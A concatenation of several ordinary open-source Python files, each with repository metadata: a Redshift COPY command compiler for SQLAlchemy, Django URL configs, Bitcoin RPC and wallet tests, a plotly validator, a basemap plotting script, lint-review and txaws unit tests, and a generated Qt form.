type_=sa.String,
))
elif element.format == 'AVRO':
format_ = 'FORMAT AS AVRO AS :avro_option'
bindparams.append(sa.bindparam(
'avro_option',
value=element.path_file,
type_=sa.String,
))
else:
format_ = ''
if element.delimiter is not None:
parameters.append('DELIMITER AS :delimiter_char')
bindparams.append(sa.bindparam(
'delimiter_char',
value=element.delimiter,
type_=sa.String,
))
if element.fixed_width is not None:
parameters.append('FIXEDWIDTH AS :fixedwidth_spec')
bindparams.append(sa.bindparam(
'fixedwidth_spec',
value=_process_fixed_width(element.fixed_width),
type_=sa.String,
))
if element.compression in ['GZIP', 'LZOP']:
parameters.append(element.compression)
if element.manifest:
parameters.append('MANIFEST')
if element.accept_any_date:
parameters.append('ACCEPTANYDATE')
if element.accept_inv_chars is not None:
parameters.append('ACCEPTINVCHARS AS :replacement_char')
bindparams.append(sa.bindparam(
'replacement_char',
value=element.accept_inv_chars,
type_=sa.String
))
if element.blanks_as_null:
parameters.append('BLANKSASNULL')
if element.date_format is not None:
parameters.append('DATEFORMAT AS :dateformat_string')
bindparams.append(sa.bindparam(
'dateformat_string',
value=element.date_format,
type_=sa.String,
))
if element.empty_as_null:
parameters.append('EMPTYASNULL')
if element.encoding in ['UTF8', 'UTF16', 'UTF16LE', 'UTF16BE']:
parameters.append('ENCODING AS ' + element.encoding)
if element.escape:
parameters.append('ESCAPE')
if element.explicit_ids:
parameters.append('EXPLICIT_IDS')
if element.fill_record:
parameters.append('FILLRECORD')
if element.ignore_blank_lines:
parameters.append('IGNOREBLANKLINES')
if element.ignore_header is not None:
parameters.append('IGNOREHEADER AS :number_rows')
bindparams.append(sa.bindparam(
'number_rows',
value=element.ignore_header,
type_=sa.Integer,
))
if element.dangerous_null_delimiter is not None:
parameters.append("NULL AS '%s'" % element.dangerous_null_delimiter)
if element.remove_quotes:
parameters.append('REMOVEQUOTES')
if element.roundec:
parameters.append('ROUNDEC')
if element.time_format is not None:
parameters.append('TIMEFORMAT AS :timeformat_string')
bindparams.append(sa.bindparam(
'timeformat_string',
value=element.time_format,
type_=sa.String,
))
if element.trim_blanks:
parameters.append('TRIMBLANKS')
if element.truncate_columns:
parameters.append('TRUNCATECOLUMNS')
if element.comp_rows:
parameters.append('COMPROWS :numrows')
bindparams.append(sa.bindparam(
'numrows',
value=element.comp_rows,
type_=sa.Integer,
))
if element.comp_update:
parameters.append('COMPUPDATE ON')
elif element.comp_update is not None:
parameters.append('COMPUPDATE OFF')
if element.max_error is not None:
parameters.append('MAXERROR AS :error_count')
bindparams.append(sa.bindparam(
'error_count',
value=element.max_error,
type_=sa.Integer,
))
if element.no_load:
parameters.append('NOLOAD')
if element.stat_update:
parameters.append('STATUPDATE ON')
elif element.stat_update is not None:
parameters.append('STATUPDATE OFF')
columns = ' (%s)' % ', '.join(
compiler.preparer.format_column(column) for column in element.columns
) if element.columns else ''
qs = qs.format(
table=compiler.preparer.format_table(element.table),
columns=columns,
format=format_,
parameters='\n'.join(parameters)
)
return compiler.process(sa.text(qs).bindparams(*bindparams), **kw)
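
# --- Illustrative usage sketch (added for documentation; not part of the
# original module). The table, manifest location and IAM role are placeholders.
def _example_copy_statement():
    meta = sa.MetaData()
    users = sa.Table('users', meta,
                     sa.Column('id', sa.Integer),
                     sa.Column('email', sa.String))
    # Executing the returned statement on a Redshift connection runs COPY.
    return CopyCommand(
        users,
        data_location='s3://example-bucket/load/users.manifest',
        aws_account_id='123456789012',
        iam_role_name='RedshiftCopyRole',
        format='CSV',
        compression='GZIP',
        ignore_header=1,
        manifest=True,
    )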
|
solackerman/sqlalchemy-redshift
|
sqlalchemy_redshift/commands.py
|
Python
|
mit
| 25,418
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^signin/', views.signin, name='signin'),
url(r'^signout/', views.signout, name='signout'),
url(r'^change_password/', views.change_password, name='change_password'),
]
|
wasit7/visionmarker
|
beta/wl_auth/urls.py
|
Python
|
mit
| 244
|
#!/usr/bin/env python3
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
#
# Test rpc http basics
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir)
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
        assert(conn.sock!=None) #connection must still be open because bitcoind uses keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
BitcoinUnlimited/BitcoinUnlimited
|
qa/rpc-tests/httpbasics.py
|
Python
|
mit
| 4,832
|
import _plotly_utils.basevalidators
class XValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="x", parent_name="isosurface.caps", **kwargs):
super(XValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "X"),
data_docs=kwargs.pop(
"data_docs",
"""
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
""",
),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/isosurface/caps/_x.py
|
Python
|
mit
| 1,178
|
# -*- coding: utf-8 -*-
# http://matplotlib.org/basemap/users/examples.html
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# create new figure, axes instances.
fig=plt.figure()
ax=fig.add_axes([0.1,0.1,0.8,0.8])
# setup mercator map projection.
m = Basemap(llcrnrlon=0.,llcrnrlat=20.,urcrnrlon=80.,urcrnrlat=70.,\
rsphere=(6378137.00,6356752.3142),\
resolution='l',projection='merc',\
lat_0=55.,lon_0=37.,lat_ts=20.)
# nylat, nylon are lat/lon of Moscow (variable names kept from the original basemap example)
nylat = 55.7522200; nylon = 37.6155600
# lonlat, lonlon are lat/lon of St Petersburg.
lonlat = 59.9386300; lonlon = 30.3141300
# draw great circle route between Moscow and St Petersburg
m.drawgreatcircle(nylon,nylat,lonlon,lonlat,linewidth=2,color='b')
m.drawcoastlines()
m.fillcontinents()
# draw parallels
m.drawparallels(np.arange(-20,0,20),labels=[1,1,0,1])
# draw meridians
m.drawmeridians(np.arange(-180,180,30),labels=[1,1,0,1])
ax.set_title('Great Circle from Moscow to St Petersburg')
plt.show()
|
sergeimoiseev/othodi_code
|
old/mpl_msk_spb.py
|
Python
|
mit
| 1,018
|
# volunteers/urls.py
from django.conf.urls import *
from django.contrib.auth.decorators import login_required
from volunteers.views import *
urlpatterns = patterns('',
#(r'^$', login_required(ShowsInProcessing.as_view()), {}, 'volunteer_show_list'),
#(r'^(?P<show_slug>\[-\w]+)/$', login_required(ShowReview.as_view()), {}, 'volunteer_show_review'),
(r'^more_videos/(?P<episode_id>\d+)/(?P<slop>\d+)/$', login_required(ExpandCutList.as_view()), {}, 'volunteer_expand_cutlist'),
(r'^more_videos/(?P<episode_id>\d+)/(?P<slop>\d+)/(?P<edit_key>\w+)/$', ExpandCutList.as_view(), {}, 'guest_expand_cutlist'),
(r'^reopen/(?P<episode_id>\d+)/$', login_required(ReopenEpisode.as_view()), {}, 'volunteer_reopen'),
(r'^reopen/(?P<episode_id>\d+)/(?P<edit_key>\w+)/$', ReopenEpisode.as_view(), {}, 'guest_reopen'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/$', login_required(EpisodeReview.as_view()), {}, 'volunteer_episode_review'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/(?P<edit_key>\w+)/$', EpisodeReview.as_view(), {}, 'guest_episode_review'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/$', login_required(EpisodeReview.as_view()), {'advanced': True}, 'volunteer_episode_review_advanced'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/(?P<edit_key>\w+)/$', EpisodeReview.as_view(), {'advanced': True}, 'guest_episode_review_advanced'),
)
|
EricSchles/veyepar
|
dj/volunteers/urls.py
|
Python
|
mit
| 1,412
|
from . import load_fixture
from lintreview.config import load_config
from lintreview.diff import DiffCollection
from lintreview.review import Review, Problems, Comment
from lintreview.repo import GithubRepository, GithubPullRequest
from mock import Mock, call
from nose.tools import eq_
from github3.issues.comment import IssueComment as GhIssueComment
from github3.pulls import PullFile
from unittest import TestCase
import json
config = load_config()
class TestReview(TestCase):
def setUp(self):
repo = Mock(spec=GithubRepository)
pr = Mock(spec=GithubPullRequest,
head='abc123',
display_name='markstory/lint-review#1',
number=2)
repo.pull_request.return_value = pr
self.repo, self.pr = repo, pr
self.review = Review(repo, pr)
def test_load_comments__none_active(self):
fixture_data = load_fixture('comments_none_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture_data))
review = Review(self.repo, self.pr)
review.load_comments()
eq_(0, len(review.comments("View/Helper/AssetCompressHelper.php")))
def test_load_comments__loads_comments(self):
fixture_data = load_fixture('comments_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture_data))
review = Review(self.repo, self.pr)
review.load_comments()
filename = "Routing/Filter/AssetCompressor.php"
res = review.comments(filename)
eq_(1, len(res))
expected = Comment(filename, None, 87, "A pithy remark")
eq_(expected, res[0])
filename = "View/Helper/AssetCompressHelper.php"
res = review.comments(filename)
eq_(2, len(res))
expected = Comment(filename, None, 40, "Some witty comment.")
eq_(expected, res[0])
expected = Comment(filename, None, 89, "Not such a good comment")
eq_(expected, res[1])
def test_filter_existing__removes_duplicates(self):
fixture_data = load_fixture('comments_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture_data))
problems = Problems()
review = Review(self.repo, self.pr)
filename_1 = "Routing/Filter/AssetCompressor.php"
filename_2 = "View/Helper/AssetCompressHelper.php"
problems.add(filename_1, 87, 'A pithy remark')
problems.add(filename_1, 87, 'Something different')
problems.add(filename_2, 88, 'I <3 it')
problems.add(filename_2, 89, 'Not such a good comment')
review.load_comments()
review.remove_existing(problems)
res = problems.all(filename_1)
eq_(1, len(res))
expected = Comment(filename_1,
87,
87,
'A pithy remark\nSomething different')
eq_(res[0], expected)
res = problems.all(filename_2)
eq_(1, len(res))
expected = Comment(filename_2, 88, 88, 'I <3 it')
eq_(res[0], expected)
def test_publish_problems(self):
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
sha = 'abc123'
review = Review(self.repo, self.pr)
review.publish_problems(problems, sha)
assert self.pr.create_review_comment.called
eq_(2, self.pr.create_review_comment.call_count)
assert_review_comments_created(
self.pr.create_review_comment.call_args_list,
errors,
sha)
def test_publish_status__ok_no_comment_label_or_status(self):
config = {
'OK_COMMENT': None,
'OK_LABEL': None,
'PULLREQUEST_STATUS': False,
}
review = Review(self.repo, self.pr, config)
review.publish_status(0)
assert not self.repo.create_status.called, 'Create status called'
assert not self.pr.create_comment.called, 'Comment not created'
        assert not self.pr.add_label.called, 'Label should not be added'
def test_publish_status__ok_with_comment_label_and_status(self):
config = {
'OK_COMMENT': 'Great job!',
'OK_LABEL': 'No lint errors',
'PULLREQUEST_STATUS': True,
}
review = Review(self.repo, self.pr, config)
review.publish_status(0)
assert self.repo.create_status.called, 'Create status not called'
self.repo.create_status.assert_called_with(
self.pr.head,
'success',
'No lint errors found.')
assert self.pr.create_comment.called, 'Issue comment created'
self.pr.create_comment.assert_called_with('Great job!')
        assert self.pr.add_label.called, 'Label should be added'
self.pr.add_label.assert_called_with('No lint errors')
def test_publish_status__has_errors(self):
config = {
'OK_COMMENT': 'Great job!',
'OK_LABEL': 'No lint errors',
'APP_NAME': 'custom-name'
}
review = Review(self.repo, self.pr, config)
review.publish_status(1)
assert self.repo.create_status.called, 'Create status not called'
self.repo.create_status.assert_called_with(
self.pr.head,
'failure',
'Lint errors found, see pull request comments.')
assert not self.pr.create_comment.called, 'Comment not created'
        assert not self.pr.add_label.called, 'Label should not be added'
def test_publish_problems_remove_ok_label(self):
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
sha = 'abc123'
config = {'OK_LABEL': 'No lint'}
review = Review(self.repo, self.pr, config)
sha = 'abc123'
review.publish_problems(problems, sha)
assert self.pr.remove_label.called, 'Label should be removed'
assert self.pr.create_review_comment.called, 'Comments should be added'
eq_(2, self.pr.create_review_comment.call_count)
self.pr.remove_label.assert_called_with(config['OK_LABEL'])
assert_review_comments_created(
self.pr.create_review_comment.call_args_list,
errors,
sha)
def test_publish_empty_comment(self):
problems = Problems(changes=[])
review = Review(self.repo, self.pr)
sha = 'abc123'
review.publish(problems, sha)
assert self.pr.create_comment.called, 'Should create a comment'
msg = ('Could not review pull request. '
'It may be too large, or contain no reviewable changes.')
self.pr.create_comment.assert_called_with(msg)
def test_publish_empty_comment_add_ok_label(self):
problems = Problems(changes=[])
config = {'OK_LABEL': 'No lint'}
review = Review(self.repo, self.pr, config)
sha = 'abc123'
review.publish(problems, sha)
assert self.pr.create_comment.called, 'ok comment should be added.'
assert self.pr.remove_label.called, 'label should be removed.'
self.pr.remove_label.assert_called_with(config['OK_LABEL'])
msg = ('Could not review pull request. '
'It may be too large, or contain no reviewable changes.')
self.pr.create_comment.assert_called_with(msg)
def test_publish_empty_comment_with_comment_status(self):
config = {
'PULLREQUEST_STATUS': True,
}
problems = Problems(changes=[])
review = Review(self.repo, self.pr, config)
sha = 'abc123'
review.publish(problems, sha)
assert self.pr.create_comment.called, 'Should create a comment'
msg = ('Could not review pull request. '
'It may be too large, or contain no reviewable changes.')
self.repo.create_status.assert_called_with(
self.pr.head,
'error',
msg)
self.pr.create_comment.assert_called_with(msg)
def test_publish_comment_threshold_checks(self):
fixture = load_fixture('comments_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture))
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
problems.set_changes([1])
sha = 'abc123'
review = Review(self.repo, self.pr)
review.publish_summary = Mock()
review.publish(problems, sha, 1)
assert review.publish_summary.called, 'Should have been called.'
def test_publish_summary(self):
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
problems.set_changes([1])
review = Review(self.repo, self.pr)
review.publish_summary(problems)
assert self.pr.create_comment.called
eq_(1, self.pr.create_comment.call_count)
msg = """There are 2 errors:
* Console/Command/Task/AssetBuildTask.php, line 117 - Something bad
* Console/Command/Task/AssetBuildTask.php, line 119 - Something bad
"""
self.pr.create_comment.assert_called_with(msg)
class TestProblems(TestCase):
two_files_json = load_fixture('two_file_pull_request.json')
# Block offset so lines don't match offsets
block_offset = load_fixture('pull_request_line_offset.json')
def setUp(self):
self.problems = Problems()
def test_add(self):
self.problems.add('file.py', 10, 'Not good')
for item in self.problems:
print item
eq_(1, len(self.problems))
self.problems.add('file.py', 11, 'Not good')
eq_(2, len(self.problems))
eq_(2, len(self.problems.all()))
eq_(2, len(self.problems.all('file.py')))
eq_(0, len(self.problems.all('not there')))
def test_add__duplicate_is_ignored(self):
self.problems.add('file.py', 10, 'Not good')
eq_(1, len(self.problems))
self.problems.add('file.py', 10, 'Not good')
eq_(1, len(self.problems))
def test_add__same_line_combines(self):
self.problems.add('file.py', 10, 'Tabs bad')
self.problems.add('file.py', 10, 'Spaces are good')
eq_(1, len(self.problems))
result = self.problems.all()
expected = 'Tabs bad\nSpaces are good'
eq_(expected, result[0].body)
def test_add__same_line_ignores_duplicates(self):
self.problems.add('file.py', 10, 'Tabs bad')
self.problems.add('file.py', 10, 'Tabs bad')
eq_(1, len(self.problems))
result = self.problems.all()
expected = 'Tabs bad'
eq_(expected, result[0].body)
def test_add__with_base_path(self):
problems = Problems('/some/path/')
problems.add('/some/path/file.py', 10, 'Not good')
eq_([], problems.all('/some/path/file.py'))
eq_(1, len(problems.all('file.py')))
eq_(1, len(problems))
def test_add__with_base_path_no_trailing_slash(self):
problems = Problems('/some/path')
problems.add('/some/path/file.py', 10, 'Not good')
eq_([], problems.all('/some/path/file.py'))
eq_(1, len(problems.all('file.py')))
eq_(1, len(problems))
def test_add__with_diff_containing_block_offset(self):
res = map(lambda f: PullFile(f),
json.loads(self.block_offset))
changes = DiffCollection(res)
problems = Problems(changes=changes)
line_num = 32
problems.add('somefile.py', line_num, 'Not good')
eq_(1, len(problems))
result = problems.all('somefile.py')
eq_(changes.line_position('somefile.py', line_num), result[0].position,
'Offset should be transformed to match value in changes')
def test_add_many(self):
errors = [
('some/file.py', 10, 'Thing is wrong'),
('some/file.py', 12, 'Not good'),
]
self.problems.add_many(errors)
result = self.problems.all('some/file.py')
eq_(2, len(result))
expected = [
Comment(errors[0][0], errors[0][1], errors[0][1], errors[0][2]),
Comment(errors[1][0], errors[1][1], errors[1][1], errors[1][2]),
]
eq_(expected, result)
def test_limit_to_changes__remove_problems(self):
res = map(lambda f: PullFile(f),
json.loads(self.two_files_json))
changes = DiffCollection(res)
# Setup some fake problems.
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(None, None, 'This is a general comment'),
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something else bad'),
(filename_1, 130, 'Filtered out, as line is not changed'),
)
self.problems.add_many(errors)
filename_2 = 'Test/test_files/View/Parse/single.ctp'
errors = (
(filename_2, 2, 'Filtered out'),
(filename_2, 3, 'Something bad'),
(filename_2, 7, 'Filtered out'),
)
self.problems.add_many(errors)
self.problems.set_changes(changes)
self.problems.limit_to_changes()
result = self.problems.all(filename_1)
eq_(2, len(result))
expected = [
(None, None, 'This is a general comment'),
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something else bad')]
eq_(result.sort(), expected.sort())
result = self.problems.all(filename_2)
eq_(1, len(result))
expected = [
Comment(filename_2, 3, 3, 'Something bad')
]
eq_(result, expected)
def test_has_changes(self):
problems = Problems(changes=None)
self.assertFalse(problems.has_changes())
problems = Problems(changes=[1])
assert problems.has_changes()
def assert_review_comments_created(call_args, errors, sha):
"""
Check that the review comments match the error list.
"""
eq_(len(call_args), len(errors), 'Errors and comment counts are off')
for i, err in enumerate(errors):
expected = call(
commit_id=sha,
path=err[0],
position=err[1],
body=err[2])
eq_(expected, call_args[i])
|
zoidbergwill/lint-review
|
tests/test_review.py
|
Python
|
mit
| 15,108
|
# Copyright (c) 2009 Canonical Ltd <duncan.mcgreggor@canonical.com>
# Licenced under the txaws licence available at /LICENSE in the txaws source.
from twisted.trial.unittest import TestCase
from txaws.exception import AWSError
from txaws.exception import AWSResponseParseError
from txaws.util import XML
REQUEST_ID = "0ef9fc37-6230-4d81-b2e6-1b36277d4247"
class AWSErrorTestCase(TestCase):
def test_creation(self):
error = AWSError("<dummy1 />", 500, "Server Error", "<dummy2 />")
self.assertEquals(error.status, 500)
self.assertEquals(error.response, "<dummy2 />")
self.assertEquals(error.original, "<dummy1 />")
self.assertEquals(error.errors, [])
self.assertEquals(error.request_id, "")
def test_node_to_dict(self):
xml = "<parent><child1>text1</child1><child2>text2</child2></parent>"
error = AWSError("<dummy />", 400)
data = error._node_to_dict(XML(xml))
self.assertEquals(data, {"child1": "text1", "child2": "text2"})
def test_set_request_id(self):
xml = "<a><b /><RequestID>%s</RequestID></a>" % REQUEST_ID
error = AWSError("<dummy />", 400)
error._set_request_id(XML(xml))
self.assertEquals(error.request_id, REQUEST_ID)
def test_set_host_id(self):
host_id = "ASD@#FDG$E%FG"
xml = "<a><b /><HostID>%s</HostID></a>" % host_id
error = AWSError("<dummy />", 400)
error._set_host_id(XML(xml))
self.assertEquals(error.host_id, host_id)
def test_set_empty_errors(self):
xml = "<a><Errors /><b /></a>"
error = AWSError("<dummy />", 500)
error._set_500_error(XML(xml))
self.assertEquals(error.errors, [])
def test_set_empty_error(self):
xml = "<a><Errors><Error /><Error /></Errors><b /></a>"
error = AWSError("<dummy />", 500)
error._set_500_error(XML(xml))
self.assertEquals(error.errors, [])
def test_parse_without_xml(self):
xml = "<dummy />"
error = AWSError(xml, 400)
error.parse()
self.assertEquals(error.original, xml)
def test_parse_with_xml(self):
xml1 = "<dummy1 />"
xml2 = "<dummy2 />"
error = AWSError(xml1, 400)
error.parse(xml2)
self.assertEquals(error.original, xml2)
def test_parse_html(self):
xml = "<html><body>a page</body></html>"
self.assertRaises(AWSResponseParseError, AWSError, xml, 400)
def test_empty_xml(self):
self.assertRaises(ValueError, AWSError, "", 400)
def test_no_request_id(self):
errors = "<Errors><Error><Code /><Message /></Error></Errors>"
xml = "<Response>%s<RequestID /></Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.request_id, "")
def test_no_request_id_node(self):
errors = "<Errors><Error><Code /><Message /></Error></Errors>"
xml = "<Response>%s</Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.request_id, "")
def test_no_errors_node(self):
xml = "<Response><RequestID /></Response>"
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_no_error_node(self):
xml = "<Response><Errors /><RequestID /></Response>"
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_no_error_code_node(self):
errors = "<Errors><Error><Message /></Error></Errors>"
xml = "<Response>%s<RequestID /></Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_no_error_message_node(self):
errors = "<Errors><Error><Code /></Error></Errors>"
xml = "<Response>%s<RequestID /></Response>" % errors
error = AWSError(xml, 400)
self.assertEquals(error.errors, [])
def test_set_500_error(self):
xml = "<Error><Code>500</Code><Message>Oops</Message></Error>"
error = AWSError("<dummy />", 500)
error._set_500_error(XML(xml))
self.assertEquals(error.errors[0]["Code"], "500")
self.assertEquals(error.errors[0]["Message"], "Oops")
|
lud4ik/txAWS
|
txaws/tests/test_exception.py
|
Python
|
mit
| 4,188
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './flowchart/FlowchartTemplate.ui'
#
# Created: Sun Feb 24 19:47:30 2013
# by: pyside-uic 0.2.13 running on PySide 1.1.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(529, 329)
self.selInfoWidget = QtGui.QWidget(Form)
self.selInfoWidget.setGeometry(QtCore.QRect(260, 10, 264, 222))
self.selInfoWidget.setObjectName("selInfoWidget")
self.gridLayout = QtGui.QGridLayout(self.selInfoWidget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.selDescLabel = QtGui.QLabel(self.selInfoWidget)
self.selDescLabel.setText("")
self.selDescLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.selDescLabel.setWordWrap(True)
self.selDescLabel.setObjectName("selDescLabel")
self.gridLayout.addWidget(self.selDescLabel, 0, 0, 1, 1)
self.selNameLabel = QtGui.QLabel(self.selInfoWidget)
font = QtGui.QFont()
font.setWeight(75)
font.setBold(True)
self.selNameLabel.setFont(font)
self.selNameLabel.setText("")
self.selNameLabel.setObjectName("selNameLabel")
self.gridLayout.addWidget(self.selNameLabel, 0, 1, 1, 1)
self.selectedTree = DataTreeWidget(self.selInfoWidget)
self.selectedTree.setObjectName("selectedTree")
self.selectedTree.headerItem().setText(0, "1")
self.gridLayout.addWidget(self.selectedTree, 1, 0, 1, 2)
self.hoverText = QtGui.QTextEdit(Form)
self.hoverText.setGeometry(QtCore.QRect(0, 240, 521, 81))
self.hoverText.setObjectName("hoverText")
self.view = FlowchartGraphicsView(Form)
self.view.setGeometry(QtCore.QRect(0, 0, 256, 192))
self.view.setObjectName("view")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
from pyqtgraph.widgets.DataTreeWidget import DataTreeWidget
from pyqtgraph.flowchart.FlowchartGraphicsView import FlowchartGraphicsView
|
ibressler/pyqtgraph
|
pyqtgraph/flowchart/FlowchartTemplate_pyside.py
|
Python
|
mit
| 2,393
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the zapwallettxes functionality.
- start two iopd nodes
- create two transactions on node 0 - one is confirmed and one is unconfirmed.
- restart node 0 and verify that both the confirmed and the unconfirmed
transactions are still available.
- restart node 0 with zapwallettxes and persistmempool, and verify that both
the confirmed and the unconfirmed transactions are still available.
- restart node 0 with just zapwallettxes and verify that the confirmed
transactions are still available, but that the unconfirmed transaction has
been zapped.
"""
from test_framework.test_framework import IoPTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
wait_until,
)
class ZapWalletTXesTest (IoPTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
self.log.info("Mining blocks...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(100)
self.sync_all()
# This transaction will be confirmed
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 10)
self.nodes[0].generate(1)
self.sync_all()
# This transaction will not be confirmed
txid2 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 20)
# Confirmed and unconfirmed transactions are now in the wallet.
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
assert_equal(self.nodes[0].gettransaction(txid2)['txid'], txid2)
# Stop-start node0. Both confirmed and unconfirmed transactions remain in the wallet.
self.stop_node(0)
self.start_node(0)
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
assert_equal(self.nodes[0].gettransaction(txid2)['txid'], txid2)
# Stop node0 and restart with zapwallettxes and persistmempool. The unconfirmed
# transaction is zapped from the wallet, but is re-added when the mempool is reloaded.
self.stop_node(0)
self.start_node(0, ["-persistmempool=1", "-zapwallettxes=2"])
wait_until(lambda: self.nodes[0].getmempoolinfo()['size'] == 1, timeout=3)
assert_equal(self.nodes[0].gettransaction(txid1)['txid'], txid1)
assert_equal(self.nodes[0].gettransaction(txid2)['txid'], txid2)
# Stop node0 and restart with zapwallettxes, but not persistmempool.
